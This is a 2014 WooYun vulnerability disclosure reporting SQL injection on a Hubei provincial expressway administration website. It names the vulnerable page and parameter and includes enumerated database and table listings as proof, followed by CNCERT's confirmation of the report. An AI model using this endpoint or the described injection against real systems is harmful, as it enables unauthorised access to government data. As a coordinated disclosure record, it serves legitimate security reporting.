漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-068200
漏洞标题:湖北省交通运输厅高速公路管理局SQL
相关厂商:湖北省交通运输厅
漏洞作者: xy小雨
提交时间:2014-07-11 18:35
修复时间:2014-08-25 18:38
公开时间:2014-08-25 18:38
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-07-11: 细节已通知厂商并且等待厂商处理中
2014-07-16: 厂商已经确认,细节仅向厂商公开
2014-07-26: 细节向核心白帽子及相关领域专家公开
2014-08-05: 细节向普通白帽子公开
2014-08-15: 细节向实习白帽子公开
2014-08-25: 细节向公众公开
简要描述:
生活中没有参照物的人,可怜;选错参照物的人,可悲。
详细说明:
SQL
http://www.ggj.hbjt.gov.cn/ggj/news/listNews.jsp?artColumn=0302010201
漏洞证明:
Database: mysql
[17 tables]
+---------------------------------------+
| columns_priv |
| db |
| func |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| proc |
| procs_priv |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
| user |
+---------------------------------------+
Database: fwq
[36 tables]
+---------------------------------------+
| info_ad |
| info_article |
| info_channel |
| info_inquiry |
| info_inquiry_ip |
| info_inquiryitem |
| info_link |
| info_pageconfig |
| info_remark |
| mag_column |
| mag_contribution |
| rss_site |
| sys_config |
| sys_duty |
| sys_empduty |
| sys_employee |
| sys_empprop |
| sys_filelist |
| sys_fileref |
| sys_flow |
| sys_flowform |
| sys_flowlog |
| sys_flownode |
| sys_idea |
| sys_menus |
| sys_movietype |
| sys_nodepoint |
| sys_org |
| sys_resource |
| sys_rolemenus |
| sys_roles |
| sys_sequenceid |
| sys_site |
| sys_user |
| sys_userprop |
| sys_userrole |
+---------------------------------------+
Database: information_schema
[17 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| KEY_COLUMN_USAGE |
| PROFILING |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
Database: ggj
[41 tables]
+---------------------------------------+
| info_ad |
| info_article |
| info_channel |
| info_inquiry |
| info_inquiry_ip |
| info_inquiryitem |
| info_link |
| info_pageconfig |
| info_remark |
| mag_column |
| mag_contribution |
| rss_site |
| sys_config |
| sys_duty |
| sys_empduty |
| sys_employee |
| sys_empprop |
| sys_filelist |
| sys_fileref |
| sys_flow |
| sys_flowform |
| sys_flowlog |
| sys_flownode |
| sys_idea |
| sys_menus |
| sys_movietype |
| sys_nodepoint |
| sys_org |
| sys_resource |
| sys_rolemenus |
| sys_roles |
| sys_sequenceid |
| sys_site |
| sys_user |
| sys_userprop |
| sys_userrole |
| voting |
| voting_data |
| voting_optin_data |
| voting_question |
| voting_question_option |
+---------------------------------------+
修复方案:
-。-
版权声明:转载请注明来源 xy小雨@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:11
确认时间:2014-07-16 10:41
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT下发给湖北分中心,由其后续协调网站管理单位处置。
最新状态:
暂无